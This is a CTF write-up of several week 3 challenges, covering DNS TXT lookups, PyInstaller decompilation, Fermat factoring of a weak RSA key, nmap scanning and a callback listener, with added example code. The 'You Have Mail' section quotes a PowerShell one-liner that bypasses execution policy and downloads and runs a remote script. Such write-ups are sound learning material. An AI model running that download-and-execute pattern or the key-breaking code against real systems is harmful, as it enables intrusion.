Set Solutions CTF 2021 Week 3

Quick Navigation
Week 1 \ Week 2 \ Week 4

Note: Fewer challenge details were documented during week 3. The website went down shortly after the CTF ended, before I was able to thoroughly document challenge prompts and steps.

To skip to detailed writeups from week 3, start reading at Captured Communication.

Save the Lizards

Note: I forgot to record the description for this challenge; however, it contained the text savethelizards.today.

.today is a top-level domain, so savethelizards.today was a candidate hostname, and a WHOIS lookup confirmed that it was a registered domain. A DNS lookup of savethelizards.today returned a TXT record containing the flag.
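The same TXT lookup done by hand over the DNS wire format, as an added example (my code, not part of the original writeup). dig +short TXT savethelizards.today is the one-line equivalent; doing it manually shows two things that are easy to miss in dig output: TXT RDATA is a sequence of length-prefixed strings that must be concatenated (a record longer than 255 bytes is split across several), and a non-zero RCODE means there is no answer to parse. The resolver address 1.1.1.1 is an assumption, and SAMPLE_RESPONSE is a constructed packet whose record value is made up, not the real record.

```python
import random
import socket
import struct

QTYPE_TXT, QCLASS_IN = 16, 1


def build_txt_query(name, txid=None):
    """Build a DNS query (RFC 1035) for the TXT records of `name`."""
    txid = random.randrange(0x10000) if txid is None else txid
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # flags: RD set; one question
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii") for label in name.rstrip(".").split(".")
    ) + b"\x00"
    return header + qname + struct.pack("!HH", QTYPE_TXT, QCLASS_IN)


def _skip_name(buf, pos):
    """Step over a (possibly compressed) domain name; return the offset after it."""
    while True:
        length = buf[pos]
        if length & 0xC0 == 0xC0:          # 2-byte compression pointer ends the name
            return pos + 2
        pos += 1
        if length == 0:                    # root label ends the name
            return pos
        pos += length


def parse_txt_response(pkt):
    """Return every TXT record in a DNS response, each reassembled into one string."""
    _txid, flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    rcode = flags & 0x000F
    if rcode != 0:                          # e.g. 3 = NXDOMAIN: nothing to parse
        raise ValueError("DNS error, rcode=%d" % rcode)
    pos = 12
    for _ in range(qdcount):
        pos = _skip_name(pkt, pos) + 4      # skip QTYPE and QCLASS
    records = []
    for _ in range(ancount):
        pos = _skip_name(pkt, pos)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[pos:pos + 10])
        pos += 10
        rdata = pkt[pos:pos + rdlen]
        pos += rdlen
        if rtype != QTYPE_TXT:              # CNAME records in the chain are skipped here
            continue
        # TXT RDATA is one or more <length><text> strings. A record longer than 255
        # bytes is split into several strings and must be concatenated to read it.
        i, parts = 0, []
        while i < len(rdata):
            n = rdata[i]
            parts.append(rdata[i + 1:i + 1 + n])
            i += 1 + n
        records.append(b"".join(parts).decode("utf-8", "replace"))
    return records


def lookup_txt(name, resolver="1.1.1.1", timeout=3.0):
    """Query `resolver` over UDP and parse the answer (needs network access)."""
    query = build_txt_query(name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(query, (resolver, 53))
        resp, _ = sock.recvfrom(4096)
    if resp[:2] != query[:2]:               # the response must echo our transaction ID
        raise ValueError("transaction ID mismatch")
    return parse_txt_response(resp)


# Constructed response for an offline check; the record value is made up, not the flag.
SAMPLE_RESPONSE = (
    struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)            # QR, RD, RA; rcode 0
    + b"\x0esavethelizards\x05today\x00" + struct.pack("!HH", QTYPE_TXT, QCLASS_IN)
    + b"\xc0\x0c"                                                  # pointer to the question name
    + struct.pack("!HHIH", QTYPE_TXT, QCLASS_IN, 300, 19)
    + b"\x08example-\x09txt-value"                                 # two strings, one record
)

if __name__ == "__main__":
    print(lookup_txt("savethelizards.today"))
```

Answers larger than 512 bytes come back truncated (TC bit) over UDP and would need a TCP retry; a single TXT record with a flag in it does not get near that limit.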

You Have Mail

Note: I forgot to record the description and many of the steps taken for this challenge.

You Have Mail led me to a Windows bat script which contained code to download and execute a remote PowerShell script titled ftony.ps1:

PowerShell -NoProfile -NoExit -ExecutionPolicy Bypass -Command iex (New-Object Net.WebClient).DownloadString('https://ssictfstatic.s3.us-east-2.amazonaws.com/ftony.ps1')

I downloaded ftony.ps1 directly with wget and removed a significant amount of the contents, including a large try-catch block regarding a user interface. I pasted the remaining code into https://tio.run/#powershell and clicked run. The flag appeared!

Knocked off Course

Challenge description:

The Episilon satellite has been knocked off course. We can attempt some course correction maneuvers, but our odds are not good. All we’ve got to work with is a chimpanzee that flew up on a recent mission. At best, you have a 1 in 10,000 chance of getting this right.

Challenge attachments: guessNum

Knocked off Course contained a 1.8 MB Linux executable called guessNum. Prior to even executing guessNum, I ran strings guessNum, and noticed a significant number of Python references, which implied that guessNum may be a compiled Python executable.

I extracted the contents of guessNum using pyinstxtractor.py.

Next, I used uncompyle6 to decompile guessNum.pyc, one of the files extracted by pyinstxtractor.

Alternatively, Knocked off Course could have been solved by using pwntools to script interaction with guessNum, since the delay between each of the ~10,000 guesses would be minimal.
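Turning the strings clue into a definite check, as an added example (my code, not the writeup's and not pyinstxtractor's). PyInstaller appends a small cookie to the bootloader executable: it starts with the magic MEI\014\013\012\013\016 and records the archive length, the TOC position and the Python version the archive was built with, which is also what decides which uncompyle6 or decompyle3 release can handle the extracted .pyc files. The field layout and the 2.0-versus-2.1 heuristic follow what pyinstxtractor does; the two SAMPLE_* byte strings are constructed test inputs with a stub bootloader, not real archives.

```python
import struct
import sys

# Every PyInstaller bootloader carries this magic at the start of its archive cookie;
# pyinstxtractor searches for the same bytes.
PYINST_MAGIC = b"MEI\014\013\012\013\016"
COOKIE_FMT_20 = "!8sIIii"     # magic, archive length, TOC offset, TOC length, Python version
COOKIE_FMT_21 = "!8sIIii64s"  # PyInstaller >= 2.1 adds the Python shared-library name


def find_pyinstaller_cookie(data):
    """Locate and decode the PyInstaller cookie in `data`; None if there is none.

    The last occurrence of the magic is used, as pyinstxtractor does, because the
    bootloader's own code also contains the magic string it searches for.
    """
    pos = data.rfind(PYINST_MAGIC)
    if pos == -1:
        return None
    # pyinstxtractor's heuristic for the cookie version: in 2.1+ the 64 bytes after
    # the 24-byte base cookie hold a name such as libpython3.10.so.1.0.
    base = struct.calcsize(COOKIE_FMT_20)
    tail = data[pos + base:pos + base + 64]
    fmt = COOKIE_FMT_21 if b"python" in tail.lower() else COOKIE_FMT_20
    size = struct.calcsize(fmt)
    if pos + size > len(data):
        return None                          # truncated file
    fields = struct.unpack(fmt, data[pos:pos + size])
    _magic, archive_len, toc_off, toc_len, pyver = fields[:5]
    pylib = fields[5].rstrip(b"\x00").decode("ascii", "replace") if len(fields) > 5 else ""
    # The version field is major*10+minor for old bootloaders (27, 38) and
    # major*100+minor for newer ones (310), which is what makes 3.10 representable.
    if pyver >= 100:
        pymaj, pymin = divmod(pyver, 100)
    else:
        pymaj, pymin = divmod(pyver, 10)
    return {
        "cookie_offset": pos,
        "cookie_version": "2.1+" if fmt == COOKIE_FMT_21 else "2.0",
        "archive_length": archive_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        "python": "%d.%d" % (pymaj, pymin),
        "pylib": pylib,
    }


def _fake_binary(cookie):
    """Constructed test input: a stub 'bootloader' followed directly by a cookie."""
    return b"\x7fELF" + b"\x00" * 128 + cookie


# Constructed samples (not real PyInstaller output): a 2.1+ cookie for Python 3.10
# and a 2.0-style cookie for Python 2.7.
SAMPLE_PYINST_310 = _fake_binary(
    struct.pack(COOKIE_FMT_21, PYINST_MAGIC, 1234, 1000, 200, 310,
                b"libpython3.10.so.1.0".ljust(64, b"\x00"))
)
SAMPLE_PYINST_27 = _fake_binary(struct.pack(COOKIE_FMT_20, PYINST_MAGIC, 512, 400, 100, 27))

if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        info = find_pyinstaller_cookie(f.read())
    print(info or "no PyInstaller cookie found")
```

Run it as python3 check_pyinst.py guessNum; the reported Python version is what to match the decompiler against before spending time on a .pyc that the tool cannot read.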

Captured Communication

Challenge description:

We have a Spy! We have captured a public key, and a ciphered message. Let’s catch this spy, otherwise we’re going to have to reformat the entire system and start over.

Challenge attachments: pub_key, cipher_text

Captured Communication provided two attachments, pub_key and cipher_text. Note that neither file is newline terminated, should you decide to try the challenge yourself.

pub_key

-----BEGIN PUBLIC KEY-----
MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQBJfoRSZIBnKN2kwQ5KHDoK
jaYFq79T4XufRQ+taIEk/HaxbPy4R1nelT9T+bWrWOylO0IzWDaPW9Hb9pQjEVdO
LxJdKpeUUZ/xAt6o2GFV0HJrZ9PQD19KvND6yTU1H2poOzmVU5OuObaq2DD5UqoO
UGUdkPfFOU1CGwcP3rhOlTeEWEcuXwZVkJXenWhFXrGjQFbpq3zUfAQ+m7OPh0Y0
Vd6jSJorwoBeA4z3lG+XLsWIdu6uLG755l30k3vtbLLK7tMU8U7li7uCfuCaOn1U
1chbesIu7TejLx7WJHu5YNneCS1L4oC2fFSyEArfUzxPgXKrGcSviqiRaU5NNY81
AgMBAAE=
-----END PUBLIC KEY-----

cipher_text


Using openssl, I was able to determine that the public key was an RSA key, with the command openssl asn1parse -in pub_key.

Given that only the public key and cipher text were provided, the next logical CTF step was to try to recover the private key using RsaCtfTool. The command python3 RsaCtfTool.py --publickey pub_key --uncipherfile cipher_text had RsaCtfTool attempt multiple types of attacks on the key. After some time, RsaCtfTool attempted a Fermat attack, which succeeded, and the UTF-8 output of the decrypted ciphertext contained the flag.
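Fermat's method only succeeds when the two primes are close together: writing n = a^2 - b^2 = (a - b)(a + b), the search starts at a = ceil(sqrt(n)) and increments a until a^2 - n is a perfect square, so the number of steps grows with (p - q)^2. That RsaCtfTool's Fermat attack won therefore says the key was generated with p and q near each other. As an added example (my code, not the writeup's and not RsaCtfTool's), the following stdlib-only Python parses the pub_key shown above into (n, e) the same way openssl asn1parse reads it (the rsaEncryption OID 1.2.840.113549.1.1.1 in the AlgorithmIdentifier is what identifies it as RSA), implements Fermat's method and the final decryption. The small key in the self-check (p = 10007, q = 10009) is constructed; the run against the real modulus under the main guard is bounded by an iteration limit and is not guaranteed to finish within it.

```python
import base64
import math

# pub_key exactly as provided with the challenge.
PUB_KEY = """-----BEGIN PUBLIC KEY-----
MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQBJfoRSZIBnKN2kwQ5KHDoK
jaYFq79T4XufRQ+taIEk/HaxbPy4R1nelT9T+bWrWOylO0IzWDaPW9Hb9pQjEVdO
LxJdKpeUUZ/xAt6o2GFV0HJrZ9PQD19KvND6yTU1H2poOzmVU5OuObaq2DD5UqoO
UGUdkPfFOU1CGwcP3rhOlTeEWEcuXwZVkJXenWhFXrGjQFbpq3zUfAQ+m7OPh0Y0
Vd6jSJorwoBeA4z3lG+XLsWIdu6uLG755l30k3vtbLLK7tMU8U7li7uCfuCaOn1U
1chbesIu7TejLx7WJHu5YNneCS1L4oC2fFSyEArfUzxPgXKrGcSviqiRaU5NNY81
AgMBAAE=
-----END PUBLIC KEY-----"""

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")   # 1.2.840.113549.1.1.1


def _der(buf, pos=0):
    """Read one DER TLV at `pos`; return (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: low bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def rsa_public_numbers(pem):
    """(n, e) from a PEM SubjectPublicKeyInfo carrying an RSA key."""
    body = "".join(l for l in pem.strip().splitlines() if not l.startswith("-----"))
    _, spki, _ = _der(base64.b64decode(body))     # SEQUENCE { AlgorithmIdentifier, BIT STRING }
    _, alg, pos = _der(spki)                       # AlgorithmIdentifier
    _, oid, _ = _der(alg)                          # OBJECT IDENTIFIER
    if oid != RSA_ENCRYPTION_OID:
        raise ValueError("not an rsaEncryption key")
    tag, bits, _ = _der(spki, pos)                 # BIT STRING; first byte = unused-bit count
    if tag != 0x03 or bits[0] != 0:
        raise ValueError("unexpected subjectPublicKey encoding")
    _, rsapub, _ = _der(bits[1:])                  # RSAPublicKey ::= SEQUENCE { n, e }
    _, n_bytes, pos = _der(rsapub)
    _, e_bytes, _ = _der(rsapub, pos)
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def fermat_factor(n, max_iter=100_000):
    """Fermat's method: n = a^2 - b^2 = (a-b)(a+b). Returns (p, q) or None if the
    iteration bound is hit, which is the normal outcome for well-separated primes."""
    a = math.isqrt(n)
    if a * a < n:
        a += 1                                     # ceil(sqrt(n))
    for _ in range(max_iter):
        b2 = a * a - n
        b = math.isqrt(b2)
        if b * b == b2:
            return a - b, a + b
        a += 1
    return None


def rsa_decrypt(c, n, e, p, q):
    """Textbook RSA decryption once the factors are known; returns the plaintext bytes."""
    d = pow(e, -1, (p - 1) * (q - 1))              # modular inverse (Python 3.8+)
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    n, e = rsa_public_numbers(PUB_KEY)
    print("n is %d bits, e = %d" % (n.bit_length(), e))
    factors = fermat_factor(n, max_iter=200_000)
    print("factors found" if factors else "Fermat did not finish within the bound")
```

For the real challenge, the cipher_text file would be read as a big-endian integer and passed to rsa_decrypt once fermat_factor returns; the plaintext bytes decode as UTF-8, as the writeup's output did.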

To the Stars

Challenge description:

WeAre.ReturningTo.Space And only one way to get there…

Challenge image:

Similar to Save the Lizards, the description of To the Stars contained text that appeared to be a URL. Given that this challenge again involved public internet-facing infrastructure, I wanted to ensure that any actions I took were, with some confidence, against Set Solutions CTF endpoints. WHOIS and DNS queries of WeAre.ReturningTo.Space revealed that the domain was 31 days old and resolved to the IP address 3.22.44.14, which belonged to an EC2 instance in the same region as To the Stars.

After initial port scans of 3.22.44.14 revealed nothing, I ran a full SYN port scan by executing sudo nmap -p- 3.22.44.14. The full scan revealed that only a single port, 42731, was open.

A netcat connection to 3.22.44.14 on port 42731 revealed that the EC2 instance was running OpenSSH on that port.

Finally, I SSH’d to 3.22.44.14 on port 42731, and some ASCII art, along with the flag, was returned in the banner.
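Why netcat showed only the OpenSSH version while ssh showed the art: RFC 4253 section 4.2 lets a server send arbitrary text lines before its SSH-protoversion-softwareversion line, and a raw socket shows those; but the text set with OpenSSH's Banner directive is sent as SSH_MSG_USERAUTH_BANNER after key exchange (RFC 4252 section 5.4), so it only appears through a real SSH client. As an added example (my code, not from the writeup), the following does the nc-style grab with a plain socket and parses the identification exchange, distinguishing any pre-version lines from the version string. The sample greetings are constructed, not captures from the challenge host; grab_ssh_greeting needs network access.

```python
import socket


def parse_ssh_greeting(data):
    """Split a server's pre-key-exchange output into pre-version lines and its version.

    RFC 4253 section 4.2: the server may send any number of text lines before the
    identification string "SSH-protoversion-softwareversion SP comments" CR LF.
    Returns None until a complete identification line has been received.
    """
    complete_lines = data.split(b"\n")[:-1]           # ignore a trailing partial line
    preamble = []
    for raw in complete_lines:
        line = raw.rstrip(b"\r").decode("utf-8", "replace")
        if not line.startswith("SSH-"):
            preamble.append(line)
            continue
        ident, _, comments = line.partition(" ")
        parts = ident.split("-", 2)                   # software may itself contain '-'
        if len(parts) != 3:
            continue                                  # malformed; keep reading
        return {
            "preamble": preamble,
            "protoversion": parts[1],
            "software": parts[2],
            "comments": comments,
        }
    return None


def grab_ssh_greeting(host, port, timeout=5.0):
    """Connect with a bare TCP socket (what nc does) and read until the version line.

    OpenSSH sends its identification string as soon as the connection opens, so
    nothing needs to be sent first. Needs network access.
    """
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        while parse_ssh_greeting(buf) is None:
            try:
                chunk = sock.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            buf += chunk
    return parse_ssh_greeting(buf), buf


# Constructed greetings for an offline check (not captures from the CTF host).
SAMPLE_OPENSSH = b"SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2\r\n"
SAMPLE_WITH_PREAMBLE = b"  *  ascii art would go here  *\r\nSSH-2.0-OpenSSH_8.2p1\r\n"

if __name__ == "__main__":
    import sys
    greeting, raw = grab_ssh_greeting(sys.argv[1], int(sys.argv[2]))
    print(greeting)
```

If grab_ssh_greeting returns None with an empty buffer, the service is either not SSH or is waiting for the client to speak first; if the preamble is non-empty but the flag is still missing, the next thing to try is an actual ssh -p connection, as the writeup did, to reach the userauth banner.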

Poison Delivery

Challenge description:

Space Force SIGINT has identified a way to intercept foreign communications. Waiting for your input commander, to provide an IP address to redirect the signal to…

The challenge page for Poison Delivery contained a prompt for an IP address. After trying various ways to break the input form, I realized that the challenge might take a bit more effort.

Presumably, the next steps, or the flag, would be sent to the IP address entered. This challenge is especially interesting because it is very out of the box: it requires the competitor to listen on a public IP address. In retrospect, my steps for Poison Delivery were:

  1. Spin up a basic, free EC2 instance with a public IP
  2. Allow all TCP traffic, disable the firewall and listen with tcpdump
  3. Determine the port that the challenge attempts to send data to
  4. Listen with netcat on the port discovered in step 3

Caught in the thrill of competition, I sped through each step, forgetting to document along the way. I was able to use my free AWS university account to easily spin up an EC2 instance, which went smoothly. I allowed TCP traffic from all IP addresses to the EC2 instance, disabled its firewall (yikes!) and listened with tcpdump. Eventually, a connection on port 38486 was logged! I set up a listener on port 38486 by executing nc -lvnp 38486.

Finally, I clicked “intercept communications” one last time, and a request came in containing the flag.

Note: you are going to have to take my word for it that the flag was contained in the 40-byte body (Content-Length: 40) of the request.
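A single-shot listener that does what the tcpdump-then-netcat steps did, as an added example (my code, not the writeup's tooling). It reads the incoming HTTP request by its Content-Length so the 40-byte body arrives completely instead of whatever nc happens to print before the peer closes, and it answers with a 200 so the challenge's client finishes cleanly. Unlike the setup described above, only the one inbound port needs to be opened in the security group, and once the callback's source address has been seen the rule can be narrowed to it; to discover the port before any listener exists, a tcpdump filter on inbound SYNs such as tcpdump -ni any 'tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn' is the usual approach. Port 38486 is the one the writeup reports; demo_local_roundtrip and its 40-byte body are constructed for an offline self-check and are not the real callback.

```python
import socket
import threading


def parse_http_request(raw):
    """Parse the request line, headers and a Content-Length-delimited body.

    Returns None until the header block is complete; 'complete' tells whether the
    whole body has arrived, so the caller keeps reading instead of printing a
    truncated request the way a bare netcat listener can.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    return {
        "method": parts[0], "target": parts[1], "version": parts[2],
        "headers": headers, "body": body[:length], "complete": len(body) >= length,
    }


def catch_one_request(bind_addr="0.0.0.0", port=38486, timeout=300.0, on_listen=None):
    """Accept one TCP connection, read one full HTTP request, answer 200 and return it.

    on_listen(port) is called once the socket is listening (the offline demo uses it
    to learn an ephemeral port). Returns (peer_address, raw_bytes, parsed_request).
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        if on_listen is not None:
            on_listen(srv.getsockname()[1])
        srv.settimeout(timeout)
        conn, peer = srv.accept()
        with conn:
            conn.settimeout(timeout)
            buf, req = b"", None
            while True:
                chunk = conn.recv(65536)
                if not chunk:
                    break                               # peer closed early
                buf += chunk
                req = parse_http_request(buf)
                if req is not None and req["complete"]:
                    break
            # A minimal reply so the challenge's client sees a normal completion.
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")
    return peer, buf, req


def demo_local_roundtrip():
    """Offline self-check: listener on loopback plus a constructed client request."""
    result, port_box, listening = {}, {}, threading.Event()

    def on_listen(p):
        port_box["port"] = p
        listening.set()

    worker = threading.Thread(
        target=lambda: result.update(value=catch_one_request("127.0.0.1", 0, 10.0, on_listen))
    )
    worker.start()
    listening.wait(5.0)
    body = b"flag-would-be-here-in-the-real-challenge"      # constructed 40-byte body
    request = (b"POST /intercept HTTP/1.1\r\nHost: listener\r\n"
               b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)
    with socket.create_connection(("127.0.0.1", port_box["port"]), timeout=10.0) as client:
        client.sendall(request)
        client.recv(1024)
    worker.join(10.0)
    return result["value"]


if __name__ == "__main__":
    peer, raw, req = catch_one_request()
    print("connection from", peer)
    print(raw.decode("iso-8859-1"))
```

Running it as-is on the EC2 instance binds port 38486 on all interfaces and waits up to five minutes for the single callback; peer is the address to keep for tightening the security-group rule afterwards.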

Week 3 lessons learned: Do not wait a month to document a CTF competition. The infrastructure will most likely be taken down, and all you will have left is broken RsaCtfTool installs.
